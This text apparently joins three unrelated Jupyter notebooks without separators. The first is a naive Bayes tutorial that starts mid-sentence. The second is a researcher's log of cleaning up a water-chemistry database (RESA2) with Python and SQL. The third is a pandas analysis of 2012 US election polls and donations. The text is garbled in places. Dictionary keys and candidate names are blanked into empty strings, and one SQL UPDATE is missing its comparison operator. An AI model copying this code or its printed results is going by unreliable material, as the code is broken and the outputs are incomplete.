posterior’s denominator and make a prediction solely on the relative values of the posterior’s numerator.  Calculate PriorsPriors can be either constants or probability distributions. In our example, this is simply the probability of being a gender. Calculating this is simple:# Number of males n_male = data['Gender'][data['Gender'] == 'male'].count() # Number of males n_female = data['Gender'][data['Gender'] == 'female'].count() # Total rows total_ppl = data['Gender'].count() n_female total_ppl # Number of males divided by the total rows P_male = n_male/total_ppl # Number of females divided by the total rows P_female = n_female/total_ppl P_maleCalculate LikelihoodRemember that each term (e.g. p(height∣female)) in our likelihood is assumed to be a normal pdf. For example:\begin{align}p(\text{height}\mid\text{female})=\frac{1}{\sqrt{2\pi\text{variance of female height in the data}}}\,e^{ -\frac{(\text{observation’s height}-\text{average height of females in the data})^2}{2\text{variance of female height in the data}} }\end{align}This means that for each class (e.g. female) and feature (e.g. height) combination we need to calculate the variance and mean value from the data. Pandas makes this easy:# Group the data by gender and calculate the means of each feature data_means = data.groupby('Gender').mean() # View the values data_means # Group the data by gender and calculate the variance of each feature data_variance = data.groupby('Gender').var() # View the values data_varianceNow we can create all the variables we need. The code below might look complex but all we are doing is creating a variable out of each cell in both of the tables above.# Means for male male_height_mean = data_means['Height'][data_variance.index == 'male'].values[0] male_weight_mean = data_means['Weight'][data_variance.index == 'male'].values[0] male_footsize_mean = data_means['Foot_Size'][data_variance.index == 'male'].values[0] # Variance for male male_height_variance = data_variance['Height'][data_variance.index == 'male'].values[0] male_weight_variance = data_variance['Weight'][data_variance.index == 'male'].values[0] male_footsize_variance = data_variance['Foot_Size'][data_variance.index == 'male'].values[0] # Means for female female_height_mean = data_means['Height'][data_variance.index == 'female'].values[0] female_weight_mean = data_means['Weight'][data_variance.index == 'female'].values[0] female_footsize_mean = data_means['Foot_Size'][data_variance.index == 'female'].values[0] # Variance for female female_height_variance = data_variance['Height'][data_variance.index == 'female'].values[0] female_weight_variance = data_variance['Weight'][data_variance.index == 'female'].values[0] female_footsize_variance = data_variance['Foot_Size'][data_variance.index == 'female'].values[0]Finally, we need to create a function to calculate the probability density of each of the terms of the likelihood (e.g. p(height|female)).# Create a function that calculates p(x | y): def p_x_given_y(x, mean_y, variance_y): # Input the arguments into a probability density function p = 1/(np.sqrt(2*np.pi*variance_y)) * np.exp((-(x-mean_y)**2)/(2*variance_y)) # return p return pApply Bayes Classifier To New Data PointAlright, our bayes classifier is ready. Remember that since we can ignore the marginal probability (the demoninator), what we are actually calculating is this:\begin{align}{\displaystyle {\text{numerator of the posterior}}={P({\text{female}})\,p({\text{height}}\mid{\text{female}})\,p({\text{weight}}\mid{\text{female}})\,p({\text{foot size}}\mid{\text{female}})}{}}\end{align}To do this, we just need to plug in the values of the unclassified person (height = 6), the variables of the dataset (e.g. mean of female height), and the function (p_x_given_y) we made above:# Numerator of the posterior if the unclassified observation is a male P_male * \ p_x_given_y(person['Height'][0], male_height_mean, male_height_variance) * \ p_x_given_y(person['Weight'][0], male_weight_mean, male_weight_variance) * \ p_x_given_y(person['Foot_Size'][0], male_footsize_mean, male_footsize_variance) # Numerator of the posterior if the unclassified observation is a female P_female * \ p_x_given_y(person['Height'][0], female_height_mean, female_height_variance) * \ p_x_given_y(person['Weight'][0], female_weight_mean, female_weight_variance) * \ p_x_given_y(person['Foot_Size'][0], female_footsize_mean, female_footsize_variance)TOC trends 2015: database clean-up (part 2)This notebook continues the work detailed [here](http://nbviewer.jupyter.org/url/www.googledrive.com/host/0BximeC_RweaeUy1jd2k3Nm1kdms/toc_trends_2015_data_cleaning.ipynb).It also describes my follow-up to the 2016 call for data, which has highlighted a few more issues that need correcting. 1. Distance to coastIn the previous notebook I calculated distance to coast values, but I haven't yet added them to RESA2. Begin by defining a new parameter (`var_id = 319`) in `RESA2.STATION_PARAMETER_DEFINITIONS`. Next I need to restructure the distance information.# Read distances to coastline table dist_csv = (r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015' r'\Data\distance_to_coast.csv') dist_df = pd.read_csv(dist_csv) # Restructure columns to [stn_id, var_id, value, entered_by, entered_date] dist_df['VALUE'] = dist_df['distance_m'] / 1000. dist_df['STATION_ID'] = dist_df['station_id'] dist_df['VAR_ID'] = 319 dist_df['ENTERED_BY'] = 'JES' dist_df['ENTERED_DATE'] = '28.06.2016' dist_df = dist_df[['STATION_ID', 'VAR_ID', 'VALUE', 'ENTERED_BY', 'ENTERED_DATE']] # Save to file out_csv = (r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015' r'\Data\distance_to_coast_upload.csv') dist_df.to_csv(out_csv, index=False) dist_df.head()The file `distance_to_coast_upload.csv` has now been uploaded to the database via Access. 2. Norway sitesI had a short meeting with Heleen on 28/06/2016 to discuss metadata for the Norwegian sites. There are 7 Norwegian sites in the main ICPW project, but 83 in the wider TOC trends analysis. Note the following: * Table 2 of Heleen's [2008 HESS paper](http://www.hydrol-earth-syst-sci.net/12/393/2008/hess-12-393-2008.pdf) gives basic land use proportions for four sites (Birkenes, Storgama, Langtjern and Kårvatn) that currently have incomplete data in RESA2. Translating this information into the land use classes in RESA2 gives the proportions shown in the table below. I've saved these values in `heleen_hess2008_land_use.xlsx` and uploaded them to the database. **NB:** I'm assuming transitional woodland is a **sub-set** of total forest area. **NB2:** Land use proportions are structured strangely in the database, with some of them attached directly to the `stations` table. This isn't ideal. In particular, note that the column named `CATCHMENT_WATER_AREA` actually corresponds to `var_id 23 (Water area excl. lake)` and not `var_id 318 (Water)`, as might be expected. | Station name | Total forest area | Deciduous area | Coniferous area | Peat area | Bare rock | Transitional woodland/scrub | Water ||:------------:|:-----------------:|:--------------:|:---------------:|:---------:|:---------:|:---------------------------:|:-----:|| Birkenes | 90 | 10 | 80 | 7 | 3 | 0 | 0 || Langtjern | 67 | | | 25 | 3 | | 5 || Kårvatn | 18 | | | 2 | 76 | | 4 || Storgama | 11 | 0 | 0 | 22 | 59 | 11 | 8 | * Heleen has suggested that might have land use proportions for (some of) the 83 Norwegian sites in the trends analysis. See Heleen's e-mail from 28/06/2016 at 09:56. * Heleen has suggested that Espen Lund or Øyvind Garmo might have shapefiles (or land use or mean elevation data) for the 7 Norwegian "feltforskningssstasjoner" (which are the sites missing elevation data mentioned in my previous notebook). She has also suggested that the [new NVE webservice](http://nevina.nve.no/) might allow catchment delineation - see e-mail received 28/06/2016 at 09:40. The NVE webservice is an impressive system, although it's very slow. It does allow generation of shapefiles, though, including land use proportions and median (not mean) elevation statistics. A test run for Birkenes yields 98% woodland cover and a median height of 226 m. These land use proportions don't agree exactly with what's given above, but I can certainly use this for estimating median elevations for the 7 Norwegian sites, which I'll assume can also be used as means as far as the database is concerned. Unfortunately, **one of the sites (Storgama) is so small it is below the resolution of the NVE web service**. Data for the other 6 is summarised in `nevina_catch_props.xlsx`. I've used these median elevation values to update the database.# Read NIVINA results table nev_xlsx = (r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015' r'\Data\correct_norway\nevina_shapefiles\nevina_catch_props.xlsx') nev_df = pd.read_excel(nev_xlsx, sheetname='data') nev_dfFor Storgama, I can't generate an exact catchment, but I can get a slightly bigger catchment based on an outflow point a little downstream. The map below shows the approximate location of the actual sampling point (yellow), overlaid on a catchment defined from the nearest point accessible via the NEVINA system (red). The larger catchment boundary has an area of $0.85 \; km^2$, compared to $0.6 \; km^2$ upstream of the yellow dot. However, the vast majority of the additional area is located at a lower elevation than the "true" catchment I'm interested in. I can use this fact to estimate the median elevation for the catchment above the yellow dot: * The elevations in NEVINA are most likely derived from a DEM i.e. a regular grid with a direct correlation between catchment area and number of cells enclosed (= number of elevation values). * To get from the "red" catchment to the desired "yellow" catchment, I therefore need to disregard $\frac{0.25}{0.8} \approx 30\%$ of the catchment area. If I assume this is the lower 30% of the catchment (which is roughly correct looking at the contours), this is the same as throwing away 30% of the DEM cells i.e. the lower 30% of elevation values. Under these assumptions, the median elevation for the smaller (yellow) catchment should be approximately equal to the $30 + \frac{100 - 30}{2} = 65th$ percentile elevation of the larger catchment. * I'll round this up and use the 70th percentile of the derived catchment from NEVINA to approximate the median elevation at Storgama. **This gives a value of 626 m, which I've added to RESA2**.**Update 01/07/2016**The land use proportions used by Anders are based on CORINE and are therefore not suitable - see e-mails from (28/06/2016 at 21:09), (29/06/2016 at 08:45) and Heleen (29/06/2016 at 09:53). It therefore seems that detailed land use proportions are not available. Heleen has suggested that I could derive them based on catchment boundaries (already delineated by Tore?) and the Norwegian 1:50k scale land use maps (are these digitised?). See e-mail from Heleen sent 29/06/2016 at 16:08. Heleen has suggested that this job is low priority for the moment, though. 3. Czech sitesAfter sending out the 2016 call for data for the basic ICPW sites, Jakub responded to say one of the Czech sites seemed to be incorrectly named. In following this up, it turns out data from several different sites have been merged together - see e-mails from Jakub and Vladimir e.g. 29/06/2016 at 10:58.This is going to take a bit of tidying up. One option is to delete all the Czech data from the database and then upload it again, but I'd like to avoid this if possible. Another issue is the Czech data include multiple datasets for the same site: Lysina (CZ07) has both monthly and weekly sampling, but only the monthly dataset is part of ICPW, whereas the weekly dataset is used for the DOC trends analysis (i.e. each series should really be assigned to a different project). Unfortunately, RESA2 has not been designed to allow different sampling and analysis protocols at the same site. The best I can do without restructuring the database is to have duplicate sites (e.g. `Lysina_Weekly` and `Lysina_Monthly`), but in general this is not a good idea as it breaks the principle of **database normalisation**, which could lead to problems later. This is actually a fundamental weakness of the RESA2 database and it's something we should **look at more carefully in the future**. For the Czech data, some manual checking shows that the monthly dataset for Lysina is actually just a subset of the weekly data, so in this case it makes sense to keep everything together as a single dataset for now. We'll need to be a little bit careful with this, though, as I get the impression **Jakub doesn't want the weekly data to be available via ICPW**. For the moment, the key issues to address are: * The current site CZ08 should be Uhlirska (not Pluhuv Bor) and the site properties needs correcting. * The weekly data for Pluhuv Bor need moving to a new site (CZ09?), which should be associated with the DOC trends project (but not the main ICPW project). To help work out what data belongs where, see e-mails from Jakub (29/06/2016 at 10:58) and Vladimir (29/06/2016 at 14:20). Begin by making Pluhuv Bor site CZ09 and changing CZ08 back to Uhlirska. The site properties for Uhlirska are available here:K:\Prosjekter\langtransporterte forurensninger\O-23300 - ICP-WATERS - HWI\Tilsendte data fra Focalsentere\CzechRepublic\Innsendt2008\CZ_Innsendt 21 mars 08_Uhlirska_CZ_ICP_011193_061106.xlsThe next step is to try to separate the Pluhuv Bor data from the Uhlirska data. This could be difficult, but to begin with I can try to do it by matching dates. The fileC:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015\Data\correct_czech\pluhuv_bor_wrong_code.xlscontains the weekly data for Pluhuv Bor, incorrectly labelled as site CZ08. If I can select just these records from the database and change the site code to CZ09, this should solve the problem. Note that this will only work as long as the sampling dates between Uhlirska and Pluhuv Bor are always different (i.e. they've never been sampled on the same day). To check this, I've copied all the dates I can find for the real Uhlirska into a new Excel file called `uhlirska_sampliong_dates.xlsx`. These can then be compared to the dates in the file above for Pluhuv Bor.# Read data plu_path = (r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015' r'\Data\correct_czech\pluhuv_bor_wrong_code.xls') uhl_path = (r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015' r'\Data\correct_czech\uhlirska_sampling_dates.xlsx') plu_df = pd.read_excel(plu_path, sheetname='Data') uhl_df = pd.read_excel(uhl_path, sheetname='Sheet1') # Check for duplicated dates print uhl_df.duplicated('Date').sum() print plu_df.duplicated('Date').sum() # Get the intersection set(uhl_df['Date']).intersection(set(plu_df['Date']))0 39So - unfortuantely - there *are* matching dates between the two sites, so using date alone isn't going to work. The only other option I can think of (other than starting again) is to upload the Pluhuv Bor data from scratch using the code CZ09, and then search through the data for CZ08, remvoing any records that are the same. Tore's tidied data for Pluhuv Bor (incorrectly labelled as CZ08) are here:K:\Prosjekter\langtransporterte forurensninger\O-23300 - ICP-WATERS - HWI\Tilsendte data fra Focalsentere\CzechRepublic\Innsendt2015\ICPCZ90-12ALLed.xlsI've copied this to a new file called *pluhuv_bor_weekly.xlsx*, removed the data for the other sites and then changed the site code to CZ09. Unfortunately, my attempts to upload this data to RESA2 via Access have failed. I'm not sure what the problem is, but the Access connection keeps timing out. To get around this, I've written my own basic code for uploading ICPW templates, which is here:C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\Upload_Template\upload_icpw_template.ipynbI have used this code to upload the (hopefully correct) data for Pluhuv Bor as site CZ09. The next step is to try to identify the records in the Uhlirska series that actually belong to Pluhuv Bor. I can't do this purely based upon date, but hopefully I can using date *and* method *and* value.# Create and test a db connection # Use custom RESA2 function to connect to db r2_func_path = r'C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\Upload_Template\useful_resa2_code.py' resa2 = imp.load_source('useful_resa2_code', r2_func_path) engine, conn = resa2.connect_to_resa2() # Test SQL statement sql = ('SELECT project_id, project_number, project_name ' 'FROM resa2.projects') df = pd.read_sql_query(sql, engine) df.head(10) # Get all water chem results currently in db for Uhlirska and Pluhuv Bor # Uhlirska sql = ("SELECT * FROM RESA2.WATER_CHEMISTRY_VALUES2 " "WHERE SAMPLE_ID IN (SELECT WATER_SAMPLE_ID " "FROM RESA2.WATER_SAMPLES " "WHERE STATION_ID = 37745)") uhl_df = pd.read_sql_query(sql, engine) # Pluhuv Bor sql = ("SELECT * FROM RESA2.WATER_CHEMISTRY_VALUES2 " "WHERE SAMPLE_ID IN (SELECT WATER_SAMPLE_ID " "FROM RESA2.WATER_SAMPLES " "WHERE STATION_ID = 33326)") plu_df = pd.read_sql_query(sql, engine) # Get sample dates sql = ("SELECT WATER_SAMPLE_ID, SAMPLE_DATE " "FROM RESA2.WATER_SAMPLES " "WHERE STATION_ID IN (33326, 37745)") sam_df = pd.read_sql_query(sql, engine) # Join dates to each site uhl_df = pd.merge(uhl_df, sam_df, how='left', left_on='sample_id', right_on='water_sample_id') uhl_df = uhl_df[['value_id', 'sample_date', 'sample_id', 'method_id', 'value', 'flag1']] plu_df = pd.merge(plu_df, sam_df, how='left', left_on='sample_id', right_on='water_sample_id') plu_df = plu_df[['value_id', 'sample_date', 'sample_id', 'method_id', 'value', 'flag1']] print 'Number of records for Pluhuv Bor: %s.' % len(plu_df) print 'Number of records for Uhlirska: %s.' % len(uhl_df) plu_df.head()Number of records for Pluhuv Bor: 14756. Number of records for Uhlirska: 18090.We can now work through all the entries in `plu_df`, testing to see if the dates, methods, values and flags match those in `uhl_df`. If they do, it's likely this is a duplicate that should be deleted from the Uhlirska series. Looking at the length of each series shown above, we might expect to find $(18090 - 14756) = 3334$ duplicates.# Round the value column to 2 decimal places uhl_df['value2'] = uhl_df['value'].round(2) plu_df['value2'] = plu_df['value'].round(2) # Join join_df = pd.merge(uhl_df, plu_df, how='left', left_on=['sample_date', 'method_id', 'value2', 'flag1'], right_on=['sample_date', 'method_id', 'value2', 'flag1']) print len(join_df) print pd.notnull(join_df['value_y']).sum() join_df.head(10)18090 13381Unfortunately, rounding differences in the way the data has been uploaded previously mean that I am unable to match based on values, which is crucial for this method to work reliably (see record 9 in the dataframe above). Unfortunately, I think the only option is therefore to **upload all the data for Uhlirska again**.I've copied all the monthly Uhlirska data to a new Excel file here:C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\TOC_Trends_Analysis_2015\Data\correct_czech\uhlirska_monthly.xlsxI can now drop all the samples associated with this site from the database and upload the data again. Let's hope this works! The following SQL deletes the records. Note that care needs to be taken with some of the constraints.First delete from `RESA2.WATER_CHEMISTRY_VALUES`: DELETE FROM RESA2.WATER_CHEMISTRY_VALUES2 WHERE sample_id IN (SELECT water_sample_id FROM RESA2.WATER_SAMPLES WHERE STATION_ID = 37745); There is also a table called `RESA2.SAMPLE_SELECTIONS` that links water samples to projects. The Czech ICPW project has `PROJECT_ID=2986`. I'm not sure whether these need to be added again afterwards - as far as I can tell, the upload procedure for ICPW doesn't add records to this table. **Bear this in mind though: if you run into problems later, you need to add records to this table for the samples from sites CZ08 and CZ09. If you do this, the `SAMPLE_SELECTION_ID` should equal 52, which corresponds to `PROJECT_ID` 2986 in the `SAMPLE_SELECTION_DEFINITIONS` table**. DELETE FROM RESA2.SAMPLE_SELECTIONS WHERE water_sample_id IN (SELECT water_sample_id FROM RESA2.WATER_SAMPLES WHERE STATION_ID = 37745); Finally, we can delete from the `WATER_SAMPLES` table: DELETE FROM RESA2.WATER_SAMPLES WHERE STATION_ID = 37745; Having committed these changes, I can now upload the Uhlirska data again using the notebook and spreadsheet linked above.I have also uploaded new data for sites CZ01 to CZ07, as given in the spreadsheet sent by Vladimir on 29/06/2016 at 14:20. Samples for these 7 sites that are not already included in the database have been copied here:C:\Data\James_Work\Staff\Heleen_d_W\ICP_Waters\Call_for_Data_2016\Replies\czech_republic\ICPDataCZ2016.xlsand then uploaded.Finally, I have moved site CZ09 (Pluhuv Bor) from the `ICPWaters CZ` project to the `ICPW_TOCTRENDS_2015_CZ` project, as requested by Jakub. 3.2. Check silica valuesOne final issue with the Czech sites concerns the values reported for silica. Due to an ambiguity in the input template, the Czechs have not always reported their units correctly - see e-mail from Vladimir received 01/07/2016 at 11:06 for details.The overall conclusion is that the units will need changing for particular silica samples. First, let's plot the data to see if there are any obvious issues, other than those already identified by Vladimir. Iæve already written some convenience plotting functions for RESA2, which can hopefully be used here.# Specify sites and parameters of interest stn_list = ['CZ01', 'CZ02', 'CZ03', 'CZ04', 'CZ05', 'CZ06', 'CZ07', 'CZ08', 'CZ09'] par_list = ['SiO2',] # Period of interest st_dt = '1980-01-01' # yyyy-mm-dd end_dt = '2015-12-31' # yyyy-mm-dd # Create plots resa2.plot_resa2_ts(stn_list, par_list, st_dt, end_dt)It seems pretty clear from the above plots that something strange is happening with silica in the latter part of the records. Most of the lake sites (CZ01 to CZ06) show a dip in 2007 that could suggest $Si$ being reported as $SiO_2$. These same lakes show a distinctive peak from around 2010 onwards (but with a dip in 2013), which could be $SiO_2$ reported as $Si$. Vladimir's e-mail focuses on the data collected since 02/08/2010. He says all the silica values have actually been reported as $SiO_2$ (*not* $Si$ as stated in his spreadsheet), ***except*** for the measurements during 2013 which are actually $Si$. This probably explains the anomalous pattern observed above. To correct these problems, I need to change the `method_id` for all the silica measurements from sites CZ01 to CZ06 inclusive for the period since 02/08/2010 (but excluding those collected during 2013). The `method_id` needs changing from `10289` (for $Si$) to `10270` (for $SiO_2$). This is done by the following SQL UPDATE RESA2.WATER_CHEMISTRY_VALUES2 SET METHOD_ID = 10270 WHERE SAMPLE_ID IN (SELECT WATER_SAMPLE_ID FROM RESA2.WATER_SAMPLES WHERE STATION_ID IN (SELECT STATION_ID FROM RESA2.STATIONS WHERE STATION_CODE IN ('CZ01', 'CZ02', 'CZ03', 'CZ04', 'CZ05', 'CZ06')) AND RESA2.WATER_SAMPLES.SAMPLE_DATE >= DATE '2010-08-02' AND EXTRACT(YEAR FROM SAMPLE_DATE) 2013) AND RESA2.WATER_CHEMISTRY_VALUES2.METHOD_ID = 10289;Re-running the code above, the plots now look like this:# Create plots resa2.plot_resa2_ts(stn_list, par_list, st_dt, end_dt)Election Data Project - Polls and DonorsIn this Data Project we will be looking at data from the 2012 election.In this project we will analyze two datasets. The first data set will be the results of political polls. We will analyze this aggregated poll data and answer some questions: 1.) Who was being polled and what was their party affiliation? 2.) Did the poll results favor Romney or Obama? 3.) How do undecided voters effect the poll? 4.) Can we account for the undecided voters? 5.) How did voter sentiment change over time? 6.) Can we see an effect in the polls from the debates?We'll discuss the second data set later on! Let's go ahead and start with our standard imports:# For data import pandas as pd from pandas import Series,DataFrame import numpy as np # For visualization import matplotlib.pyplot as plt import seaborn as sns sns.set_style('whitegrid') %matplotlib inline from __future__ import divisionThe data for the polls will be obtained from HuffPost Pollster. You can check their website [here](http://elections.huffingtonpost.com/pollster). There are some pretty awesome politcal data stes to play with there so I encourage you to go and mess around with it yourself after completing this project. We're going to use the requests module to import some data from the web. For more information on requests, check out the documentation [here](http://docs.python-requests.org/en/latest/).We will also be using StringIO to work with csv data we get from HuffPost. StringIO provides a convenient means of working with text in memory using the file API, find out more about it [here](http://pymotw.com/2/StringIO/)# Use to grab data from the web(HTTP capabilities) import requests # We'll also use StringIO to work with the csv file, the DataFrame will require a .read() method from StringIO import StringIO # This is the url link for the poll data in csv form url = "http://elections.huffingtonpost.com/pollster/2012-general-election-romney-vs-obama.csv" # Use requests to get the information in text form source = requests.get(url).text # Use StringIO to avoid an IO error with pandas poll_data = StringIO(source)Now that we have our data, we can set it as a DataFrame.# Set poll data as pandas DataFrame poll_df = pd.read_csv(poll_data) # Let's get a glimpse at the data poll_df.info() Int64Index: 589 entries, 0 to 588 Data columns (total 14 columns): Pollster 589 non-null object Start Date 589 non-null object End Date 589 non-null object Entry Date/Time (ET) 589 non-null object Number of Observations 567 non-null float64 Population 589 non-null object Mode 589 non-null object Obama 589 non-null int64 Romney 589 non-null int64 Undecided 422 non-null float64 Pollster URL 589 non-null object Source URL 587 non-null object Partisan 589 non-null object Affiliation 589 non-null object dtypes: float64(2), int64(2), object(10) memory usage: 69.0+ KBGreat! Now let's get a quick look with .head()# Preview DataFrame poll_df.head()Let's go ahead and get a quick visualization overview of the affiliation for the polls.# Factorplot the affiliation sns.factorplot('Affiliation',data=poll_df)Looks like we are overall relatively neutral, but still leaning towards Democratic Affiliation, it will be good to keep this in mind. Let's see if sorting by the Population hue gives us any further insight into the data.# Factorplot the affiliation by Population sns.factorplot('Affiliation',data=poll_df,hue='Population')Looks like we have a strong showing of likely voters and Registered Voters, so the poll data should hopefully be a good reflection on the populations polled. Let's take another quick overview of the DataFrame.# Let's look at the DataFrame again poll_df.head()Let's go ahead and take a look at the averages for Obama, Romney , and the polled people who remained undecided.# First we'll get the average avg = pd.DataFrame(poll_df.mean()) avg.drop('Number of Observations',axis=0,inplace=True) # After that let's get the error std = pd.DataFrame(poll_df.std()) std.drop('Number of Observations',axis=0,inplace=True) # now plot using pandas built-in plot, with kind='bar' and yerr='std' avg.plot(yerr=std,kind='bar',legend=False)Interesting to see how close these polls seem to be, especially considering the undecided factor. Let's take a look at the numbers.# Concatenate our Average and Std DataFrames poll_avg = pd.concat([avg,std],axis=1) #Rename columns poll_avg.columns = ['Average','STD'] #Show poll_avgLooks like the polls indicate it as a fairly close race, but what about the undecided voters? Most of them will likely vote for one of the candidates once the election occurs. If we assume we split the undecided evenly between the two candidates the observed difference should be an unbiased estimate of the final difference.# Take a look at the DataFrame again poll_df.head()If we wanted to, we could also do a quick (and messy) time series analysis of the voter sentiment by plotting Obama/Romney favor versus the Poll End Dates. Let's take a look at how we could quickly do tht in pandas. Note: The time is in reverse chronological order. Also keep in mind the multiple polls per end date.# Quick plot of sentiment in the polls versus time. poll_df.plot(x='End Date',y=['Obama','Romney','Undecided'],marker='o',linestyle='')While this may give you a quick idea, go ahead and try creating a new DataFrame or editing poll_df to make a better visualization of the above idea! To lead you along the right path for plotting, we'll go ahead and answer another question related to plotting the sentiment versus time. Let's go ahead and plot out the difference between Obama and Romney and how it changes as time moves along. Remember from the last data project we used the datetime module to create timestamps, let's go ahead and use it now.# For timestamps from datetime import datetimeNow we'll define a new column in our poll_df DataFrame to take into account the difference between Romney and Obama in the polls.# Create a new column for the difference between the two candidates poll_df['Difference'] = (poll_df.Obama - poll_df.Romney)/100 # Preview the new column poll_df.head()Great! Keep in mind that the Difference column is Obama minus Romney, thus a positive difference indicates a leaning towards Obama in the polls. Now let's go ahead and see if we can visualize how this sentiment in difference changes over time. We will start by using groupby to group the polls by their start data and then sorting it by that Start Date.# Set as_index=Flase to keep the 0,1,2,... index. Then we'll take the mean of the polls on that day. poll_df = poll_df.groupby(['Start Date'],as_index=False).mean() # Let's go ahead and see what this looks like poll_df.head()Great! Now plotting the Differencce versus time should be straight forward.# Plotting the difference in polls between Obama and Romney fig = poll_df.plot('Start Date','Difference',figsize=(12,4),marker='o',linestyle='-',color='purple')It would be very interesting to plot marker lines on the dates of the debates and see if there is any general insight to the poll results.The debate dates were Oct 3rd, Oct 11, and Oct 22nd. Let's plot some lines as markers and then zoom in on the month of October. In order to find where to set the x limits for the figure we need to find out where the index for the month of October in 2012 is. Here's a simple for loop to find that row. Note, the string format of the date makes this difficult to do without using a lambda expression or a map.# Set row count and xlimit list row_in = 0 xlimit = [] # Cycle through dates until 2012-10 is found, then print row index for date in poll_df['Start Date']: if date[0:7] == '2012-10': xlimit.append(row_in) row_in +=1 else: row_in += 1 print min(xlimit) print max(xlimit)329 356Great now we know where to set our x limits for the month of October in our figure.# Start with original figure fig = poll_df.plot('Start Date','Difference',figsize=(12,4),marker='o',linestyle='-',color='purple',xlim=(329,356)) # Now add the debate markers plt.axvline(x=329+2, linewidth=4, color='grey') plt.axvline(x=329+10, linewidth=4, color='grey') plt.axvline(x=329+21, linewidth=4, color='grey')Surprisingly, thse polls reflect a dip for Obama after the second debate against Romney, even though memory serves that he performed much worse against Romney during the first debate. For all these polls it is important to remeber how geographical location can effect the value of a poll in predicting the outcomes of a national election. Donor Data SetLet's go ahead and switch gears and take a look at a data set consisting of information on donations to the federal campaign. This is going to be the biggest data set we've looked at so far. You can download it [here](https://www.dropbox.com/s/l29oppon2veaq4n/Election_Donor_Data.csv?dl=0) , then make sure to save it to the same folder your iPython Notebooks are in.The questions we will be trying to answer while looking at this Data Set is: 1.) How much was donated and what was the average donation? 2.) How did the donations differ between candidates? 3.) How did the donations differ between Democrats and Republicans? 4.) What were the demographics of the donors? 5.) Is there a pattern to donation amounts?# Set the DataFrame as the csv file donor_df = pd.read_csv('Election_Donor_Data.csv') # Get a quick overview donor_df.info() # let's also just take a glimpse donor_df.head()What might be interesting to do is get a quick glimpse of the donation amounts, and the average donation amount. Let's go ahead and break down the data.# Get a quick look at the various donation amounts donor_df['contb_receipt_amt'].value_counts()8079 different amounts! Thats quite a variation. Let's look at the average and the std.# Get the mean donation don_mean = donor_df['contb_receipt_amt'].mean() # Get the std of the donation don_std = donor_df['contb_receipt_amt'].std() print 'The average donation was %.2f with a std of %.2f' %(don_mean,don_std)The average donation was 298.24 with a std of 3749.67Wow! That's a huge standard deviation! Let's see if there are any large donations or other factors messing with the distribution of the donations.# Let's make a Series from the DataFrame, use .copy() to avoid view errors top_donor = donor_df['contb_receipt_amt'].copy() # Now sort it top_donor.sort() # Then check the Series top_donorLooks like we have some negative values, as well as some huge donation amounts! The negative values are due to the FEC recording refunds as well as donations, let's go ahead and only look at the positive contribution amounts# Get rid of the negative values top_donor = top_donor[top_donor >0] # Sort the Series top_donor.sort() # Look at the top 10 most common donations value counts top_donor.value_counts().head(10)Here we can see that the top 10 most common donations ranged from 10 to 2500 dollars. A quick question we could verify is if donations are usually made in round number amounts? (e.g. 10,20,50,100,500 etc.) We can quickly visualize this by making a histogram and checking for peaks at those values. Let's go ahead and do this for the most common amounts, up to 2500 dollars.# Create a Series of the common donations limited to 2500 com_don = top_donor[top_donor < 2500] # Set a high number of bins to account for the non-round donations and check histogram for spikes. com_don.hist(bins=100)Looks like our intuition was right, since we spikes at the round numbers. Let's dive deeper into the data and see if we can seperate donations by Party, in order to do this we'll have to figure out a way of creating a new 'Party' column. We can do this by starting with the candidates and their affliliation. Now let's go ahead and get a list of candidates# Grab the unique object from the candidate column candidates = donor_df.cand_nm.unique() #Show candidatesLet's go ahead and seperate Obama from the Republican Candidates by adding a Party Affiliation column. We can do this by using map along a dictionary of party affiliations. Lecture 36 has a review of this topic.# Dictionary of party affiliation party_map = {'': 'Republican', '': 'Republican', '': 'Republican', '': 'Republican', '': 'Republican', '': 'Republican', 'Obama, Barack': 'Democrat', '': 'Republican', '': 'Republican', '': 'Republican', ". 'Buddy' III": 'Republican', '': 'Republican', '': 'Republican'} # Now map the party with candidate donor_df['Party'] = donor_df.cand_nm.map(party_map)A quick note, we could have done this same operation manually using a for loop, however this operation would be much slower than using the map method.''' for i in xrange(0,len(donor_df)): if donor_df['cand_nm'][i] == 'Obama,Barack': donor_df['Party'][i] = 'Democrat' else: donor_df['Party'][i] = 'Republican' '''Let's look at our DataFrame and also make sure we clear refunds from the contribution amounts.# Clear refunds donor_df = donor_df[donor_df.contb_receipt_amt >0] # Preview DataFrame donor_df.head()Let's start by aggregating the data by candidate. We'll take a quick look a the total amounts received by each candidate. First we will look a the total number of donations and then at the total amount.# Groupby candidate and then displayt the total number of people who donated donor_df.groupby('cand_nm')['contb_receipt_amt'].count()Clearly Obama is the front-runner in number of people donating, which makes sense, since he is not competeing with any other democratic nominees. Let's take a look at the total dollar amounts.# Groupby candidate and then displayt the total amount donated donor_df.groupby('cand_nm')['contb_receipt_amt'].sum()This isn't super readable, and an important aspect of data science is to clearly present information. Let's go ahead and just print out these values in a clean for loop.# Start by setting the groupby as an object cand_amount = donor_df.groupby('cand_nm')['contb_receipt_amt'].sum() # Our index tracker i = 0 for don in cand_amount: print " The candidate %s raised %.0f dollars " %(cand_amount.index[i],don) print '\n' i += 1The candidate raised 2711439 dollars The candidate raised 7101082 dollars The candidate raised 12832770 dollars The candidate raised 3330373 dollars The candidate Johnson, raised 566962 dollars The candidate McCotter, raised 39030 dollars The candidate raised 135877427 dollars The candidate raised 21009620 dollars The candidate raised 6004819 dollars The candidate raised 20305754 dollars The candidate Roemer, . 'Buddy' III raised 373010 dollars The candidate raised 88335908 dollars The candidate raised 11043159 dollarsThis is okay, but its hard to do a quick comparison just by reading this information. How about just a quick graphic presentation?# PLot out total donation amounts cand_amount.plot(kind='bar')Now the comparison is very easy to see. As we saw berfore, clearly Obama is the front-runner in donation amounts, which makes sense, since he is not competeing with any other democratic nominees. How about we just compare Democrat versus Republican donations?# Groupby party and then count donations 